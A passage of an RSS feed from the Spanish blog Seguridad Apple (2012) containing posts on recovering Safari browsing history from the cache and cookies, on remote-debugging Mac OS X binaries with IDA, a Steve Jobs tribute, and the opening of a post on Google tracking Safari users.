&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-aZ07CwLzhKk/T0an7QwMwoI/AAAAAAAADGQ/0Qab7ey5zLE/s1600/Jobs_Heaven2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-aZ07CwLzhKk/T0an7QwMwoI/AAAAAAAADGQ/0Qab7ey5zLE/s1600/Jobs_Heaven2.jpg" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Sirva este post para recordar otro poco más el talento y trabajo de &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt;, que nunca viene mal.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3Qhpre8f3Js/T0an8hGvBqI/AAAAAAAADGY/0PltYB4lCbs/s1600/Jobs_heaven1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-3Qhpre8f3Js/T0an8hGvBqI/AAAAAAAADGY/0PltYB4lCbs/s1600/Jobs_heaven1.jpg" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Buen fin de semana a todos.&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-7930332905955590051?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=b-KIu9lrQcI:ir0VtBMRGaE:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=b-KIu9lrQcI:ir0VtBMRGaE:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=b-KIu9lrQcI:ir0VtBMRGaE:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/b-KIu9lrQcI/se-confirma-steve-jobs-impone-el-ipad.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-kyYNzpzcrHQ/T0am9GUlPlI/AAAAAAAADGI/YQt8p-FFDkA/s72-c/Iglesia_Ipad2.jpeg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/se-confirma-steve-jobs-impone-el-ipad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-5016105306290844350</guid><pubDate>Fri, 24 Feb 2012 06:01:00 +0000</pubDate><atom:updated>2012-02-24T07:01:00.137+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">antiforensics</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Análisis forense</category><title>Privacidad en Apple Safari: La Caché y las Cookies</title><description>&lt;div style="text-align: justify;"&gt;Una de las opciones que dimos cuando hablamos de &lt;a href="http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-el-historial.html"&gt;El Historial de Navegación en Apple Safari&lt;/a&gt;, es hacer uso de la opción de &lt;i&gt;&lt;b&gt;Borrar el Historial&lt;/b&gt;&lt;/i&gt;. La pregunta es... ¿se puede saber qué sitios han sido navegados si se ha hecho uso de ella? Pues sí, analizando la caché del navegador.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, si se ha seleccionado la opción de &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt;, todos los archivos descargados en la caché del navegador serán eliminados al cerrar la sesión. Sin embargo, si no se ha seleccionado esta opción y se decide hacer uso del borrado manual del &lt;i&gt;&lt;b&gt;Historial de Navegación&lt;/b&gt;&lt;/i&gt;, o si el navegador ha tenido un problema que le ha hecho cerrarse de manera inesperada - o si el navegador aún está abierto - es posible recuperar el &lt;i&gt;&lt;b&gt;Historial de Navegación&lt;/b&gt;&lt;/i&gt; desde &lt;i&gt;&lt;b&gt;la Caché y las Cookies&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-c3fgmhc3kuk/T0ah0iA8tPI/AAAAAAAADFo/kk5ION-32tM/s1600/Cache_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-c3fgmhc3kuk/T0ah0iA8tPI/AAAAAAAADFo/kk5ION-32tM/s640/Cache_1.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Opciones de Caché en Apple Safari. Se accede con el botón Detalles&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Los objetos de la caché pueden ser consultados desde las &lt;i&gt;&lt;b&gt;Preferencias&lt;/b&gt;&lt;/i&gt; de &lt;i&gt;&lt;b&gt;Adobe Safari&lt;/b&gt;&lt;/i&gt;, desde donde es posible acceder a la lista de todos los elementos cacheados en un momento determinado.&amp;nbsp;Desde allí, es posible vaciar la caché manualmente, lo que borrará todos los objetos almacenados hasta ese momento.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-648CnLsL2ww/T0ah2YfiTdI/AAAAAAAADFw/II77yoZH_vo/s1600/Cache_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-648CnLsL2ww/T0ah2YfiTdI/AAAAAAAADFw/II77yoZH_vo/s640/Cache_2.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Datos de caché guardados y opción de Eliminar&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sin embargo, si la caché no ha sido eliminada, ésta permanece en el fichero &lt;i&gt;&lt;b&gt;/Users/usuario/Lybary/Caches/com.apple.Safari/cache.db&lt;/b&gt;&lt;/i&gt;, con toda la información relativa a los archivos descargados.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-_gy_J8fVxe8/T0ah7G-WynI/AAAAAAAADGA/D2l9fVuH9_A/s1600/Cache_DB.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-_gy_J8fVxe8/T0ah7G-WynI/AAAAAAAADGA/D2l9fVuH9_A/s1600/Cache_DB.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: El fichero de almacenamiento de caché&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Esto permite que, con la ayuda de alguna aplicación que analice la caché, como el caso de &lt;a href="http://www.beecubu.com/desktop-apps/SafariCacheExplorer/"&gt;Safari Cache Explorer&lt;/a&gt;, sea posible obtener fechas y &lt;i&gt;&lt;b&gt;URLs&lt;/b&gt;&lt;/i&gt; de navegación como si fuera el &lt;i&gt;&lt;b&gt;Historial de Navegación &lt;/b&gt;&lt;/i&gt;completo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-D7el_F4yrl8/T0ah4sCCUAI/AAAAAAAADF4/-aJEsktbNt0/s1600/Cache_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-D7el_F4yrl8/T0ah4sCCUAI/AAAAAAAADF4/-aJEsktbNt0/s640/Cache_3.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 4: Recuperando el historial de navegación con Safari Caché Explorer&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Es por eso que desde &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt; os recomendamos que activéis siempre que sea posible la &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt;, que además evita otro tipo de ataques que iremos contando más adelante. Si no, cuando borres el Historial de Navegación, acuérdate también de &lt;i&gt;&lt;b&gt;Borrar la Caché&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-5016105306290844350?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=_EHT03Y5HQQ:NqmWkCNmdC4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=_EHT03Y5HQQ:NqmWkCNmdC4:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=_EHT03Y5HQQ:NqmWkCNmdC4:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/_EHT03Y5HQQ/privacidad-en-apple-safari-la-cache-y.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-c3fgmhc3kuk/T0ah0iA8tPI/AAAAAAAADFo/kk5ION-32tM/s72-c/Cache_1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-la-cache-y.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-1079499485142871455</guid><pubDate>Thu, 23 Feb 2012 06:11:00 +0000</pubDate><atom:updated>2012-02-23T07:11:00.279+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Herramientas</category><category domain="http://www.blogger.com/atom/ns#">Ingeniería inversa</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><title>Analizar binarios de Mac OS X desde Windows con IDA</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://1.bp.blogspot.com/-IQ-njmd7t40/T0VLOCEBxKI/AAAAAAAADFg/hufMLgAjiR8/s1600/ida_pro.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-IQ-njmd7t40/T0VLOCEBxKI/AAAAAAAADFg/hufMLgAjiR8/s1600/ida_pro.png" /&gt;&lt;/a&gt;&lt;a href="http://www.hex-rays.com/products/ida/"&gt;IDA&lt;/a&gt; es uno de los más conocidos debuggers multiplataforma con soporte para sistemas operativos Windows, Linux y Mac OS X.&amp;nbsp;La característica de &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt; que tratamos hoy en este artículo es la del sistema de debugging remoto que permite llevar a cabo la depuración de un binario de una plataforma desde otra. En otras palabras: realizar el análisis de una aplicación para Mac OS X desde un sistema Windows o Linux, o viceversa.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para montar el entorno se necesita un sistema operativo Windows y uno Mac OS X, ambos con IDA instalado en ellos, y para aprender la como funciona esta característica seguir el tutorial &lt;a href="http://www.hex-rays.com/products/ida/debugger/mac/index.shtml"&gt;IDA Mac OS X Debugging&lt;/a&gt; de &lt;i&gt;&lt;b&gt;Hex-Rays&lt;/b&gt;&lt;/i&gt;, los desarrolladores de &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt;.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Inicialmente será necesario descargar el fichero &lt;a href="http://www.hex-rays.com/products/ida/debugger/mac/macvuln.tgz"&gt;macvuln.tgz&lt;/a&gt;, aplicación para Mac OS X que se puede utilizar de ejemplo para analizar.&amp;nbsp;Una vez descargada la aplicación, se debe configurar el servidor de &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt; con los permisos adecuados. Para ello se deben ejecutar los siguientes comandos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-lqZPcNN96DU/T0VITqcAQOI/AAAAAAAADE4/Lbz8TKuSzio/s1600/ida1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-lqZPcNN96DU/T0VITqcAQOI/AAAAAAAADE4/Lbz8TKuSzio/s1600/ida1.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Configuración de permisos sobre el mac_server&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Una vez que toda la parte de Mac OS X está totalmente configurada se puede iniciar el servidor de &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt; llamado &amp;nbsp;&lt;i&gt;&lt;b&gt;mac_server&lt;/b&gt;&lt;/i&gt;&amp;nbsp;mediante el parámetro &lt;i&gt;&lt;b&gt;-P&lt;/b&gt;&lt;/i&gt; para establecerle una clave de acceso.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-B5GL3qKaZP8/T0VIUXOFlWI/AAAAAAAADE8/izCmmLMKwGg/s1600/ida2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-B5GL3qKaZP8/T0VIUXOFlWI/AAAAAAAADE8/izCmmLMKwGg/s1600/ida2.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Ejecución del servidor IDA para mac_os&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Los pasos para conectar &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt; desde el sistema Windows al servidor corriendo en Mac OS X a través de la red empiezan por cargar el binario &lt;i&gt;&lt;b&gt;macvuln&lt;/b&gt;&lt;/i&gt; descargado anteriormente, y acto seguido seleccionar el depurador Mac OS X remoto mediante la ruta de menús &lt;i&gt;&lt;b&gt;‘Debugger / Select debugger / Remote Mac OS X debugger’&lt;/b&gt;&lt;/i&gt;, tal y como se muestra en la siguiente captura de pantalla.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-hajaBNAtH3k/T0VIU4qqBzI/AAAAAAAADFE/SWr23nJzZts/s1600/ida3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-hajaBNAtH3k/T0VIU4qqBzI/AAAAAAAADFE/SWr23nJzZts/s1600/ida3.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Arrancando IDA para usar debugging remoto en Mac OS X&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El último paso a llevar a cabo es la configuración de la dirección IP y la contraseña del servidor, junto con los parámetros que se deseen ejecutar sobre la aplicación ‘&lt;i&gt;&lt;b&gt;macvuln&lt;/b&gt;&lt;/i&gt;’. Esta ventana es accesible desde &lt;i&gt;&lt;b&gt;‘Debugger / Process options’&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-pUuibgvFQiw/T0VIVc9h_8I/AAAAAAAADFQ/weJ21at83cc/s1600/ida4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-pUuibgvFQiw/T0VIVc9h_8I/AAAAAAAADFQ/weJ21at83cc/s1600/ida4.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 4: Configuración del proceso que se quiere debuggear&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como último paso ya únicamente es necesario iniciar la depuración mediante el hotkey &lt;i&gt;&lt;b&gt;‘F9’&lt;/b&gt;&lt;/i&gt; y comenzar el proceso de ingeniería sobre el proceso en cuestión.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-JsZWoxCePxc/T0VIWcCmCfI/AAAAAAAADFY/Vst5ECXc3eg/s1600/ida5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-JsZWoxCePxc/T0VIWcCmCfI/AAAAAAAADFY/Vst5ECXc3eg/s1600/ida5.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 5: Aplicación Mac OS X siendo analizada con IDA remotamente desde Windows&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Esperamos que con este pequeño artículo más de uno os animéis a analizar muchas más aplicaciones para Mac OS X y a buscar en ellas esas características &lt;i&gt;"ocultas"&lt;/i&gt; que a veces impactan en la seguridad de nuestros sistemas.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-1079499485142871455?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=xlc8Ik9uFOs:feM9DNo7-ko:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=xlc8Ik9uFOs:feM9DNo7-ko:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=xlc8Ik9uFOs:feM9DNo7-ko:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/xlc8Ik9uFOs/analizar-binarios-de-mac-os-x-desde.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-IQ-njmd7t40/T0VLOCEBxKI/AAAAAAAADFg/hufMLgAjiR8/s72-c/ida_pro.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/analizar-binarios-de-mac-os-x-desde.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-8436217571101157732</guid><pubDate>Wed, 22 Feb 2012 06:08:00 +0000</pubDate><atom:updated>2012-02-22T07:08:33.179+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet Explorer</category><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Microsoft</category><title>El caso del espionaje de Google a usuarios continúa...</title><description>&lt;div style="text-align: justify;"&gt;La historia del &lt;a href="http://www.seguridadapple.com/2012/02/google-vigilaba-la-navegacion-de-los.html"&gt;espionaje por parte de Google hacia los usuarios de Apple Safari&lt;/a&gt; que destapó el &lt;i&gt;&lt;b&gt;Wall Street Journal&lt;/b&gt;&lt;/i&gt; ha traído cola. En primer lugar, 